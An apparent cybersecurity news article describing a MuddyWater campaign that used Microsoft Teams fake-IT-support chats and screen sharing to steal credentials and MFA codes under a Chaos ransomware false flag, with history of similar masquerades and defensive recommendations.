Imagine getting a message on Microsoft Teams from someone who appears to be your company’s IT support. They claim to need your credentials to fix a pressing security issue. It sounds routine. It happens every day in offices around the world. But in early 2026, this exact scenario became the opening move in a highly targeted cyberattack orchestrated by an Iranian state-sponsored group. The attack, which leveraged social engineering through Microsoft Teams, was not what it seemed on the surface. It was a false flag operation designed to steal credentials, bypass multi-factor authentication, and leave behind a long-term foothold in the victim’s network. Security firm Rapid7 observed and documented the entire sequence, revealing a sophisticated campaign that blurs the line between cybercrime and state-sponsored espionage. The group behind it is MuddyWater, and their use of Microsoft Teams as an attack vector marks a significant evolution in their tactics.
The Anatomy of a MuddyWater Microsoft Teams Attack
The attack chain begins with something deceptively simple: an unsolicited chat request on Microsoft Teams. The threat actor reaches out to an employee, posing as an internal IT support representative. The message is urgent. It claims the employee’s account has been compromised or that a critical security patch needs to be applied. The goal is to create a sense of panic and compliance.
Once the employee engages, the attacker requests screen-sharing access. This is the pivotal moment. With screen-sharing enabled, the attacker can observe the employee’s desktop in real time. They ask the employee to open specific configuration files, navigate to VPN portals, or type credentials into notepad documents. The attacker watches everything. They capture passwords, usernands, and MFA tokens as they appear on screen.
How MFA Gets Bypassed
Multi-factor authentication is supposed to be a strong defense. But in this scenario, the attacker circumvents it by observing the MFA prompt directly on the victim’s screen. When a push notification or one-time code appears, the attacker sees it and uses it immediately. This renders MFA nearly useless against a live screen-sharing session where the attacker controls the narrative.
In one documented instance, the attacker directed the victim to enter credentials into a locally created text file. This gave the attacker a clean copy of the login details. With those credentials and the MFA token in hand, the attacker could authenticate as the victim from their own machine, often without raising any alarms.
False Flag: MuddyWater Poses as Chaos Ransomware
What makes this campaign particularly deceptive is the false flag element. On the surface, the attack looked like a typical ransomware incident involving the Chaos RaaS group. Chaos is a known ransomware-as-a-service operation that emerged in early 2025. It uses double extortion, threatens DDoS attacks, and even employs quadruple extortion by contacting victims’ customers or competitors. It is a criminal enterprise through and through.
But the Rapid7 analysis revealed something different. The attackers did not encrypt files. They exfiltrated data. They installed remote management tools like DWAgent and AnyDesk for long-term persistence. They moved laterally through the network, conducting reconnaissance rather than demanding a ransom. The infection chain delivered a multi-stage payload via a binary called ‘ms_upd.exe’, downloaded using curl from an external server. This was not the work of a profit-driven ransomware gang. It was a state-backed intelligence gathering operation wearing a criminal mask.
By mimicking Chaos ransomware, MuddyWater achieves two things. First, they muddy attribution. Security researchers and incident responders may spend valuable time chasing a criminal group when the real adversary is a nation-state. Second, they gain operational cover. If the attack fails or is detected, the victim may assume it was random cybercrime rather than a targeted intrusion by Iran.
A Brief History of MuddyWater’s Ransomware Masquerades
This is not the first time MuddyWater has borrowed the clothes of a ransomware gang. The group has a documented history of using ransomware as a cover for destructive and espionage-focused operations. Understanding this pattern is essential for defenders who want to distinguish between criminal extortion and state-backed intrusion.
September 2020: Thanos Ransomware via PowGoop
In September 2020, MuddyWater targeted prominent Israeli organizations using a loader called PowGoop. This malware deployed a variant of Thanos ransomware. But the attack was not primarily about financial gain. The destructive capabilities suggested a strategic objective aligned with Iranian interests. The ransomware element served as both a distraction and a means of disruption.
2023: DarkBit and DEV-1084 Collaboration
In 2023, Microsoft disclosed that MuddyWater had teamed up with a threat actor known as DEV-1084, which operated under the DarkBit persona. Together, they conducted destructive attacks under the pretense of deploying ransomware. Again, the extortion element was a facade. The real goal was to cause damage and sow confusion about who was responsible.
October 2025: Qilin Ransomware Against an Israeli Hospital
As recently as October 2025, MuddyWater is believed to have used Qilin ransomware to target an Israeli government hospital. Check Point noted that the attackers were likely Iranian-affiliated operators using a criminal ransomware brand while serving a strategic Iranian objective. The use of Qilin provided cover and plausible deniability. It also allowed the attackers to operate within the cybercrime ecosystem, leveraging affiliate programs and extortion infrastructure that would normally be associated with criminal groups.
The Chaos RaaS Ecosystem: A Closer Look
To understand why MuddyWater chose to impersonate Chaos, it helps to know what Chaos actually is. Chaos is a ransomware-as-a-service group that emerged in early 2025. It is known for aggressive extortion tactics that go well beyond simple encryption.
Chaos advertisements appear on cybercrime forums like RAMP and RehubCom. The group recruits affiliates who can carry out attacks in exchange for a cut of the ransom payments. Chaos provides a full toolkit, including initial access methods, encryption payloads, and negotiation support. This makes it an attractive brand for threat actors who want to operate at scale without building their own infrastructure.
From Double to Quadruple Extortion
Chaos started with a double extortion model: encrypt files and threaten to leak stolen data. Then they added triple extortion by threatening distributed denial-of-service attacks against the victim’s infrastructure. More recently, they have been observed using quadruple extortion, which includes contacting the victim’s customers, partners, or competitors to increase pressure. This escalation of tactics makes Chaos one of the more aggressive RaaS groups currently active.
As of late March 2026, Chaos had claimed 36 victims on its data leak site. The majority of these victims were in the United States, with construction, manufacturing, and business services being the most targeted sectors. The group’s operational tempo and public bravado make them an ideal cover for a state-backed actor like MuddyWater. When Chaos claims credit for an attack, few question whether the real perpetrator might be a nation-state.
How MuddyWater’s True Intentions Differ from Chaos
The intrusion analyzed by Rapid7 revealed several behaviors that distinguish MuddyWater from a typical Chaos affiliate. Understanding these differences can help incident responders recognize a false flag operation early in the investigation.
First, the attackers did not deploy ransomware. They exfiltrated data and left behind remote management tools like DWAgent and AnyDesk. A ransomware attack that does not encrypt files is a red flag. Second, the attackers used interactive screen-sharing via Microsoft Teams to harvest credentials and manipulate MFA. This high-touch social engineering phase is uncommon in low-sophistication ransomware attacks, which often rely on phishing emails or vulnerability exploitation.
Third, the attackers established long-term persistence. They installed backdoors and maintained access for extended periods. A criminal ransomware group typically wants to execute the ransomware, collect the ransom, and move on. They do not invest in maintaining a hidden presence inside the network. Fourth, the attackers engaged in detailed reconnaissance. They ran discovery commands, accessed VPN configuration files, and mapped the internal network. This level of intelligence gathering aligns with espionage, not extortion.
You may also enjoy reading: Age of Empires II: Definitive Ed. Coming to Mac This Month.
Finally, the threat actor contacted the victim via email for ransom negotiations, but the negotiation itself appeared to be a diversion. The attackers were not primarily interested in payment. They were interested in maintaining access and collecting intelligence.
Practical Defenses Against MuddyWater Microsoft Teams Attacks
Organizations can take concrete steps to defend against this type of attack. The following measures are designed to reduce the risk of social engineering via collaboration platforms and to detect false flag operations early.
Strengthen Identity Verification for IT Support Requests
Employees should be trained to verify IT support requests through a secondary channel. If someone contacts them via Teams claiming to be from IT, they should call the IT department directly using a known phone number. They should never trust the caller ID or profile picture in the chat. Attackers can easily spoof these details.
Restrict Screen-Sharing to Trusted Sessions Only
Organizations should configure Microsoft Teams to disable screen-sharing for external chat requests by default. Screen-sharing should only be possible after the identity of the participant has been verified. This simple policy change can stop the attack before it begins.
Implement MFA Resistant to Real-Time Bypass
Traditional MFA methods like push notifications and one-time codes are vulnerable when an attacker can see the victim’s screen. Organizations should adopt phishing-resistant MFA, such as FIDO2 security keys or certificate-based authentication. These methods require physical possession of a device and cannot be observed on a screen.
Additionally, organizations should monitor for anomalous MFA acceptance patterns. If a single user approves multiple MFA prompts in rapid succession from different geographic locations, this could indicate a live session takeover.
Monitor for Unauthorized Remote Management Tools
The MuddyWater attack relied on tools like DWAgent and AnyDesk for persistence. Security teams should maintain an inventory of authorized remote management tools and monitor for installations of new or unauthorized tools. Endpoint detection and response systems can be configured to alert on the installation of these specific applications.
Train Employees to Recognize High-Pressure Social Engineering
Employees are the first line of defense. They should be trained to recognize signs of social engineering, including urgency, requests for credentials, and requests for screen-sharing from unknown contacts. Regular phishing simulations that include Teams-based scenarios can help reinforce this training.
Deploy Network Segmentation for Critical Systems
The attackers in this campaign used compromised credentials to move laterally and access VPN configuration files. Network segmentation can limit this lateral movement. Critical systems, including domain controllers and VPN servers, should be isolated in separate network segments with strict access controls.
The Broader Implication of False Flag Operations
The MuddyWater false flag campaign represents a growing trend in cyber operations. State-sponsored groups are increasingly adopting the tools, tactics, and brands of criminal ransomware groups. This convergence creates significant challenges for attribution and incident response.
When a security team investigates a ransomware incident, they typically follow the money. They look for ransom notes, extortion portals, and cryptocurrency wallets. But in a false flag operation, these artifacts are deliberately planted to mislead. The real objective may be espionage, data theft, or destructive sabotage. Incident responders must learn to look beyond the surface indicators and examine behaviors like persistence, reconnaissance, and data exfiltration patterns.
This blurring of lines also creates a strategic dilemma for governments and law enforcement. Criminal ransomware groups are already difficult to prosecute due to jurisdictional issues. State-backed actors operating under criminal cover add another layer of complexity. Should a ransomware attack be treated as a crime or as an act of state-sponsored aggression? The answer depends on accurately identifying the true perpetrator, which is exactly what false flags are designed to prevent.
The MuddyWater case is a stark reminder that not every ransomware attack is what it appears to be. The presence of Chaos branding, a ransom note, and a data leak site does not automatically mean the attack was criminal in nature. Security teams must be prepared to investigate with a broader lens, looking for signs of state-backed tradecraft hidden beneath the criminal facade.
